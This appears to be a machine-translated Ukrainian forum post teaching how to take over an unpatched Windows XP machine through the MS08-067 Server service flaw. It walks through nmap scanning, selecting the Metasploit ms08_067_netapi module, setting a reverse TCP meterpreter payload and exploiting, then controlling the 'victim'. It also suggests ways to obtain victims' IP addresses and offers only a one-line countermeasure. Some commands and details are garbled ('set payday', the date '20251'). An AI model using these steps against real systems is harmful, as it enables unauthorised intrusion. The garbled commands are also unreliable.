Опубліковано 2 червня, 20251 р Адміністратор Як ви думаєте, чи можливо зламати один комп'ютер, маючи лише IP-адресу?! Відповідь - так, якщо ви використовуєте непатчену (вразливу) ОС. Якщо ви мені не вірите, то прочитайте повну статтю.У цій статті я продемонструю, як зламати віддалений комп'ютер, використовуючи недолік синтаксичного аналізу в коді канонізації шляху NetAPI32.dll через службу сервера ( CVE-2008-4250 ). Перш ніж ми перейдемо до фактичного процесу експлуатації, дозвольте мені надати більше деталей про цю вразливість служби сервера.Деталі про вразливість служби сервера (MS08-067):Служба Microsoft Windows Server забезпечує підтримку спільного використання ресурсів, таких як файли та служби друку, через мережу.Служба сервера вразлива до вразливості віддаленого виконання коду. Вразливість спричинена помилкою в netapi32.dll під час обробки послідовностей символів обходу каталогу в іменах шляхів. Це можна використати для пошкодження пам'яті стеку, наприклад, надсилаючи RPC-запити, що містять спеціально створені імена шляхів, до компонента служби сервера. Функція «NetprPathCanonicalize()» у файлі «netapi32.dll» уражена.Зловмисний запит до вразливої системи призводить до повного компрометування вразливих комп'ютерів.Ця вразливість впливає на Windows XP, Windows 2000, Windows Server 2003, Windows Vista та Windows Server 2008. Але зловмисникам потрібен автентифікований доступ на платформах Windows Vista та Server 2008, щоб скористатися цією проблемою.Експлуатація MS08-067 за допомогою Metasploit:Вимоги:Віртуальна БоксВідступ 5Цільова ОС (XP)Крок 1:Створіть дві віртуальні машини (VM), а саме «Target» та «BT5». Встановіть XP всередину віртуальної машини Target та Backtrack всередину BT5. Запустіть дві віртуальні машини.Якщо ви не знаєте, як створювати віртуальні машини, будь ласка, прочитайте цей посібник VirtualBox .Крок 2: Знайдіть IP-адресу Target. Відкрийте командний рядок на цільовій машині (XP). Введіть « ipconfig », щоб знайти IP-адресу цільової системи.Хакери використовують різні методи для знаходження IP-адреси жертви. Наприклад, надсилаючи посилання, яке отримає деталі IP, або використовуючи Angry IP Scanner.Крок 3: Збір інформації.Тепер давайте зберемо деяку інформацію про цільову машину. Для цього ми скористаємося інструментом nmap.Відкрийте термінал на машині BT5 (Backtrack) та введіть « nmap -O 192.168.56.12 ». Тут 192.168.56.12 - це IP-адреса цільової машини. Якщо ви подивитеся на результат, ви можете знайти список відкритих портів та версію ОС. Крок 4: Metasploit Тепер відкрийте термінал на машині BT5 (Backtrack) та введіть « msfconsole ». Msfconsole – це найпопулярніший інтерфейс для Metasploit Framework. Він надає централізовану консоль «все в одному» та дозволяє вам ефективно отримувати доступ практично до всіх опцій, доступних у Metasploit Framework. Давайте скористаємося командою пошуку, щоб знайти модулі експлойту за ключовим словом netapi. Введіть « search netap i». Тепер ви можете побачити список модулів, що відповідають netapi. Ми збираємося експлойтувати MS08-067, тому введіть « use exploit/windows/smb/ms08_067_netapi ». Крок 5: Встановлення корисного навантаження Як завжди, давайте також використаємо корисне навантаження Reverse Tcp для цього експлойту. Введіть « set payday windows/meterpreter/reverse_tcp » у msfconsole. Крок 6: Параметри Введіть « set LHOST 192.168.56.10 ». Тут 192.168.56.10 — це IP-адреса машини Backtrack. Ви можете знайти IP-адресу, ввівши команду «ifconfig» у терміналі. Введіть « set RHOST 192.168.56.12 ». Тут 192.168.56.12 — це IP-адреса цільової машини. Крок 7: Експлуатація Гаразд, час використати вразливість, введіть « exploit » у консолі. Якщо експлойт пройшов успішно, ви побачите наступний результат. Тепер ми можемо керувати віддаленим комп’ютером за допомогою meterpreter. Наприклад, введення «screenshot» призведе до створення знімка екрана системи жертви. Контрзаходи: Часто оновлюйте ОС.
Для публікації повідомлень створіть обліковий запис або авторизуйтесь